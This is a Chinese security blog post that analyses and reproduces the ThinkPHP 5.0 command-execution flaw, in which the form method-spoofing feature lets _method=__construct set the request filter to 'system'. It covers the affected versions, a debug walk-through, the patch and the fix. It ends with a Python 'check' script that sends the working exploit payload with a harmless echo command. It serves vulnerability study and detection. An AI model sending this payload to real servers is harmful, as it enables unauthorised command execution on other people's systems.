php post 漏洞_ThinkPHP 5.0命令执行漏洞分析及复现

ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了依赖,支持Composer ,实现了真正的惰性加载,并且为 API 开发做了深入的支持,在功能、性能以及灵活性方面都较为突出 。

漏洞描述

ThinkPHP5.0在核心代码中实现了表单请求类型伪装的功能,该功能利用$_POST['_method']变量来传递真实的请求方法,当攻击者设置$_POST['_method']=__construct时,Request类的method方法便会将该类的变量进行覆盖,攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时便会进行执行任意命令。

影响范围

ThinkPHP 5.0.0 ~ ThinkPHP 5.0.23

什么是表单请求类型伪装

            

如上表单,可以在POST表单里面提交_method变量,传入需要伪装的请求类型 ,该请求从客户端看来是POST请求,而服务器会将该请求识别PUT请求并进行处理,其中变量_method可以在application\config.php文件中进行修改。

// 表单请求类型伪装变量'var_method'             => '_method',

该特性的作用:

安全防护 ,隐藏自己真实请求信息;

整合现有应用系统 ,例如现有的应用系统A的接口只接受put请求,而你的应用系统B只能发起post请求。

漏洞复现

环境

OS        : windows7Webserver : phpstudy  (apache + php5.6.27)thinkphp  : 5.0.20

条件

// 开启thinkphp的调试模式, 文件application\config.php// 应用调试模式'app_debug'              => true,

操作

cd D:\phpStudy\WWWgit clone https://github.com/top-think/think tp5git checkout v5.0.22cd tp5git clone https://github.com/top-think/framework thinkphpgit checkout v5.0.22

开启thinkphp的debug模式

// 开启thinkphp的调试模式, 文件application\config.php// 应用调试模式'app_debug'              => true,

开启apache,发送payload:

37281af84d29b00badc6c369788a8a48.png

漏洞分析

利用xdebug+phpstorm进行调试,配置方式请大家自行搜索。

thinkphp采用filter对请求参数进行过滤,默认的filter在config.php中为空字符串,thinkphp首先会设置默认的过滤函数:

f36c12e3e8b1350cf0385d368249eae9.png23ff79da4a565b7048ae0486d15edb3f.png

filter被设置为空字符串,继续跟踪在路由检查内部会对Request类的filter变量进行覆盖,跟进routeCheck函数。

d33219db51854f891a7946405677a0ad.png1b83fea83c7598666edb7ea0d44d7481.png

再上图中调用$requesr->method()关键方法,跟进:

28c878a7d33941963248a85ac3c9c1a6.png

可以发现该函数会获取用户传入的_method=__construct变量,并调用__construct方法,跟进:

f558aacd0352d6a3bb4324dffb6f9281.png

filter变量被设置成system,继续:

eeee50d8f7170d0446d20395162fad68.png

当debug模式开启时,会记录请求信息,会调用$request->param()方法,跟进:

4226c91e3fc9a52172ff6abbda92c458.pnge6938f3915e8b2b9fda37318a1cbc4c3.png

如上,根据filter变量设置过滤器,跟进:

8d326c116a15ebb87b09d10e8517aa30.png

过滤器变成了数组['system'],跟进array_walk_recursive函数:

c1721612eb091687e3f4449a22eef2af.png

该函数内会对参数进行过滤,调用了call_user_func('system', 'dir'),完成了命令执行,结果如下:

d0256196cda17bef6ea36aa979c2ef8f.png

接下来,thinkphp在执行模块的过程中还会再一次设置默认filter,使得filter='',但是不会再次覆盖filter为system,所以接下来的一次过滤并没有能够再次执行命令。

c524f40a19e884facfe7605d81eaf467.png8ac7b643c48447653276a20175556194.png

整个执行流程如下 :ff96be6ef2cae4108f4572aa762026d1.png

官方补丁

官方补丁中限制了_method可疑设置的请求方法,并在处理_method之后将其unset,无法再利用__construct进行变量覆盖。

3972f844dc033b95a6cdf1051d5e35e6.png

漏洞修复

升级到5.0.24及以上,不用开启debug模式。

检测脚本

# coding=utf-8import requestsdef check(ip, port, timeout=3):    url = 'http://{ip}:{port}/tp5/public/index.php'.format(ip=ip, port=port)    # url = 'http://{ip}:{port}/index.php'.format(ip=ip, port=port)    data = {        '_method':'__construct',        'filter':'system',        'a':'echo abcd',    }    headers = {        'content-type' : 'application/x-www-form-urlencoded',        'user-agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',        'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'    }    resp = requests.post(url, data=data, headers=headers, timeout=timeout)    if resp.content.find('abcd') != -1:        return 'thinkphp5.0 命令执行:' + urlif __name__ == '__main__':    print check('127.0.0.1', '80')

总结

该漏洞主要是:

表单请求类型伪装 + filter参数 = 覆盖变量filter;

变量覆盖filter + debug模式 + 执行filter = 命令执行。

*本文作者:小纨绔,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

0f045521b024b70bf24bed437855fa94.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值